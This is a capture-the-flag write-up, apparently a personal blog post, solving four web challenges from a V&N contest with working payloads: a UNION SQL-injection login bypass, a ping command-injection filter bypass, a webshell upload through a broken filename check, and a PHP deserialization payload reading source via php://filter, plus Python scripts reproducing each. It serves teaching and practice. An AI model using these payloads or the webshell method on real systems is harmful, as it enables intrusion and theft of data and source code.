V&N rocks! Good experience this time; once I had finished the web challenges I watched the masters AK (all-kill) the other categories.
Here are my write-ups for the web challenges I got out.

BabySqli

The challenge shows you its SQL statement, so build a union query that returns a forged admin row whose password column is md5('123456') (e10adc3949ba59abbe56e057f20f883e), the same value sent in pw:

name=adm'union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'#&pw=123456 

GXY{y0u_4re_not_aDmin!}
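As an added example (not the challenge's own code, whose schema and PHP are not on the page), the following Python reproduces the pattern the payload exploits: the name field is concatenated straight into the query, so the injected UNION supplies a row the application then "authenticates" against. The users table and the admin hash are constructed sample data; SQLite stands in for MySQL, so the trailing "#" comment is emulated by cutting the query there. The hardened form with a bound parameter is shown beside it.

```python
import hashlib
import sqlite3

# Constructed sample data: the real challenge's table is not on the page. All
# that matters is an admin row whose password hash the attacker does not know.
def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)",
               (hashlib.md5(b"unknown-admin-secret").hexdigest(),))
    return db

def mysql_like_query(db, sql):
    # MySQL treats '#' as a line comment but SQLite does not, so drop everything
    # after the first '#' to mimic what the challenge's MySQL backend sees.
    return db.execute(sql.split("#", 1)[0]).fetchone()

def vulnerable_login(db, name, pw):
    # The injection point: name is concatenated raw into the statement,
    # the pattern the challenge hinted at by revealing its SQL.
    sql = "SELECT id, username, password FROM users WHERE username='%s'" % name
    row = mysql_like_query(db, sql)
    if row is None:
        return False
    # Typical PHP follow-up check: the row must be admin and md5(pw) must match
    # the password column of whatever row came back.
    return row[1] == "admin" and row[2] == hashlib.md5(pw.encode()).hexdigest()

def safe_login(db, name, pw):
    # Hardened form: the bound parameter keeps the quote inside the value,
    # so no second SELECT can be appended.
    row = db.execute("SELECT id, username, password FROM users WHERE username=?",
                     (name,)).fetchone()
    if row is None:
        return False
    return row[1] == "admin" and row[2] == hashlib.md5(pw.encode()).hexdigest()

# The page's payload. No user 'adm' exists, so the only row returned is the
# forged one, and its password column is md5('123456').
PAYLOAD_NAME = "adm'union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'#"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", vulnerable_login(db, PAYLOAD_NAME, "123456"))
    print("safe:", safe_login(db, PAYLOAD_NAME, "123456"))
```

The comparison is against whatever row the query returns, not against the stored admin row, which is why controlling the result set is enough; pinning the lookup to the real row (or hashing server-side against a row fetched by a parameterised query, as in safe_login) closes it.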

ping ping ping

The challenge is a box that runs the ping command on your input; it filters most symbols, the word "flag" and the space character.

1;cat$IFS`ls`; makes cat take the output of ls as its argument list (the page shows it as 1;cat$IFSls, but as written that is a single unset variable $IFSls and cat would get no argument). $IFS stands in for the banned space, and `ls` supplies the file names, so flag.php is read without ever typing "flag".

Reference: http://www.it1352.com/757355.html
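To make the bypass concrete, here is an added Python example (not from the challenge, whose filter source is not on the page). It models a filter that blocks the space, "flag" and the usual metacharacters while leaving ";", "$" and the backtick alone, which is what the payload above relies on; then it runs the candidate inputs through a stand-in for system("ping -c 1 " . $ip) in a throwaway directory holding a constructed flag file. The ping binary is replaced by true so it works offline; the injected part after ";" behaves identically.

```python
import os
import subprocess
import tempfile

# Assumed filter: the challenge's real regex is not on the page. This blocks the
# space, the word "flag" and common shell metacharacters, and leaves ';', '$'
# and the backtick alone, as the writeup's payload requires.
BLOCKED_CHARS = set(" &|<>(){}[]'\"\\")
BLOCKED_WORDS = ("flag",)

def passes_filter(ip):
    if any(c in BLOCKED_CHARS for c in ip):
        return False
    return not any(w in ip.lower() for w in BLOCKED_WORDS)

def run_ping_box(ip, cwd):
    # Mirror of the vulnerable pattern: the input is glued onto a shell command
    # line. 'true' replaces 'ping' so the example needs no network.
    proc = subprocess.run(["sh", "-c", "true -c 1 " + ip], cwd=cwd,
                          stdin=subprocess.DEVNULL, capture_output=True, text=True)
    return proc.stdout

def attempt(ip, cwd):
    """What the ping box returns for one input: 'blocked' or the command output."""
    return run_ping_box(ip, cwd) if passes_filter(ip) else "blocked"

PAYLOADS = [
    "1;cat flag.php",      # space and 'flag': blocked
    "1;cat$(ls)",          # parentheses: blocked
    "1;cat${IFS}`ls`",     # braces: blocked
    "1;cat$IFSls",         # $IFSls is one (unset) variable: runs a bare cat
    "1;cat$IFS`ls`",       # $IFS splits the word, `ls` supplies every filename
]

def demo():
    """Run every payload in a temp dir holding a constructed flag.php and index.php."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "flag.php"), "w") as f:
            f.write("GXY{constructed_sample_flag}\n")
        with open(os.path.join(d, "index.php"), "w") as f:
            f.write("<?php /* ping box */ ?>\n")
        return {p: attempt(p, d) for p in PAYLOADS}

if __name__ == "__main__":
    for p, r in demo().items():
        print("%-20s -> %r" % (p, r))
```

The unquoted $IFS expands to whitespace and is subject to field splitting, which is why cat$IFS`ls` becomes "cat flag.php index.php" even though no literal space was sent; the bare-cat case shows why the backticks matter.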

BabysqliV3.0

Log in with admin / password, then the upload directory lets you read the source:

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<form action="" method="post" enctype="multipart/form-data">
Upload file
<input type="file" name="file" />
<input type="submit" name="submit" value="Upload" />
</form>
<?php
error_reporting(0);

class Uploader{
    public $Filename;
    public $cmd;
    public $token;

    function __construct(){
        $sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
        $ext = ".txt";
        @mkdir($sandbox, 0777, true);
        // Note the spaces around each '|': the last alternative is " \." (space, dot),
        // so a name such as shell.php is not matched and is used as the path as-is.
        if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
            $this->Filename = $_GET['name'];
        }
        else{
            $this->Filename = $sandbox.$_SESSION['user'].$ext;
        }
        $this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
        $this->token = $_SESSION['user'];
    }

    function upload($file){
        global $sandbox;
        global $ext;
        // '[' and ']' are taken as the PCRE delimiters here, so the pattern that
        // actually runs is ^a-z0-9: the literal text "a-z0-9" at the start of the name.
        if(preg_match("[^a-z0-9]",$this->Filename)){
            $this->cmd = "die('illegal filename!');";
        }
        else{
            if($file['size'] > 1024){
                $this->cmd = "die('you are too big (′▽`〃)');";
            }
            else{
                // Run later by eval() in __destruct: moves the temp file to $this->Filename
                $this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
            }
        }
    }

    function __toString(){
        global $sandbox;
        global $ext;
        // return $sandbox.$this->Filename.$ext;
        return $this->Filename;
    }

    function __destruct(){
        if($this->token != $_SESSION['user']){
            $this->cmd = "die('check token falied!');";
        }
        eval($this->cmd);
    }
}

if(isset($_FILES['file'])) {
    $uploader = new Uploader();
    $uploader->upload($_FILES["file"]);
    // __toString() supplies the path, so the uploaded file is read back and echoed
    if(@file_get_contents($uploader)){
        echo "Below is the file you uploaded:<br>".$uploader."<br>";
        echo file_get_contents($uploader);
    }
}
?>

I couldn't get the phar route to work. Once I saw that the filename was controllable I just wrote a webshell straight in; I asked the challenge author, and that was unintended.
Looking at it afterwards, the reason is probably that the author accidentally typed a space before the "." in /data:\/\/ | filter:\/\/ | php:\/\/ | \./i: the last alternative is therefore " ." (space, then dot), so shell.php never matches and the check is as good as absent. The second check in upload(), preg_match("[^a-z0-9]", ...), is no better: PHP takes "[" and "]" as the delimiters, so the pattern actually compiled is ^a-z0-9, which only rejects names that literally begin with "a-z0-9".
The screenshot no longer loads, so it is not included.
Use name to control the filename (for instance ?name=shell.php, any .php name works) and upload a webshell; keep it under the 1024-byte limit enforced in upload(). Because move_uploaded_file() only runs from eval() in __destruct, the file_get_contents() echo in the same request fails and nothing is shown back, but the file is written once the script ends.
Then connect with AntSword (蚁剑).
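An added example (not part of the writeup or the challenge) that puts the two broken checks beside what they were presumably meant to be. The "intended" patterns are my assumption: the alternation without padding spaces, and the character class wrapped in real delimiters, i.e. /[^a-z0-9]/. Python's re agrees with PCRE on these patterns, so the results are what the PHP sees.

```python
import re

# The two checks from the challenge's Uploader class, as written. The literal
# spaces around each '|' are exactly what the PHP source contains.
CHALLENGE_NAME_CHECK = re.compile(r"data:// | filter:// | php:// | \.", re.IGNORECASE)
# PHP's preg_match("[^a-z0-9]", ...) uses '[' and ']' as the delimiters, so the
# pattern that really runs is ^a-z0-9: the literal text "a-z0-9" at the start.
CHALLENGE_UPLOAD_CHECK = re.compile(r"^a-z0-9")

# Assumed intent: no padding around '|', and "/[^a-z0-9]/" as a real class.
INTENDED_NAME_CHECK = re.compile(r"data://|filter://|php://|\.", re.IGNORECASE)
INTENDED_UPLOAD_CHECK = re.compile(r"[^a-z0-9]")

def challenge_accepts(name):
    """True if the name survives both checks as the challenge wrote them."""
    return (CHALLENGE_NAME_CHECK.search(name) is None
            and CHALLENGE_UPLOAD_CHECK.search(name) is None)

def intended_accepts(name):
    """True if the name survives the checks as they were presumably meant."""
    return (INTENDED_NAME_CHECK.search(name) is None
            and INTENDED_UPLOAD_CHECK.search(name) is None)

def compare(names):
    """Map each candidate filename to (accepted by challenge, accepted by intended)."""
    return {n: (challenge_accepts(n), intended_accepts(n)) for n in names}

if __name__ == "__main__":
    samples = ["shell.php", "shell .php", "php://input", "a-z0-9x", "abc123"]
    for name, (weak, fixed) in compare(samples).items():
        print("%-12r challenge=%-5s intended=%s" % (name, weak, fixed))
```

shell.php passes both of the challenge's checks and is rejected by both intended ones; only a name that literally contains " ." or starts with "a-z0-9" is ever refused by the code as shipped.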

Do you know robot

robots.txt points to the page that contains the source.

?exp=O:10:"FileReader":4:{s:8:"Filename";s:58:"php://filter/read=convert.base64-encode/resource=index.php";s:5:"start";i:0;s:10:"max_length";i:10000;} 

Leave the GET parameter empty and send the payload in the POST parameter.
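Hand-writing PHP serialized objects is where the s:N: byte counts go wrong, so here is an added Python helper (not the challenge's code) that builds the FileReader payload above from a dict. It serializes a subset of PHP types the way serialize() does, counting string lengths in bytes, derives the property count from the fields actually emitted, and decodes the base64 the php://filter wrapper hands back. The property names and values are the ones in the payload on this page; the decode helper assumes the server returns the base64 text as-is.

```python
import base64

def php_serialize(value):
    """Serialize a Python value the way PHP's serialize() would.

    Supported subset: bool, int, str, None, and objects written as a
    (class_name, {property: value}) tuple. String lengths are measured in
    bytes, because PHP's s:N: counts bytes, not characters.
    """
    if isinstance(value, bool):          # must precede int: bool subclasses int
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if value is None:
        return "N;"
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, tuple) and len(value) == 2:
        cls, props = value
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
        # the count comes from what is actually written, so it cannot drift
        return 'O:%d:"%s":%d:{%s}' % (len(cls.encode("utf-8")), cls, len(props), body)
    raise TypeError("unsupported value: %r" % (value,))

def file_reader_payload(path, start=0, max_length=10000):
    """Build the FileReader object for the challenge's exp parameter.

    php://filter with convert.base64-encode makes the server return the PHP
    source base64-encoded instead of executing it, so the <?php block survives.
    """
    resource = "php://filter/read=convert.base64-encode/resource=" + path
    return php_serialize(("FileReader",
                          {"Filename": resource, "start": start, "max_length": max_length}))

def decode_response(b64_text):
    """Turn the base64 the challenge prints back into readable source."""
    return base64.b64decode(b64_text).decode("utf-8", errors="replace")

if __name__ == "__main__":
    print(file_reader_payload("index.php"))
```

Swap the path to read other files (for example a config included by index.php) without touching the counts; the php://filter prefix is what keeps the server from executing the target instead of returning it.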

I solved the other web challenges later than the masters in the group and didn't write them up, so they are not included.
They were all fairly simple.

Categories: Tech
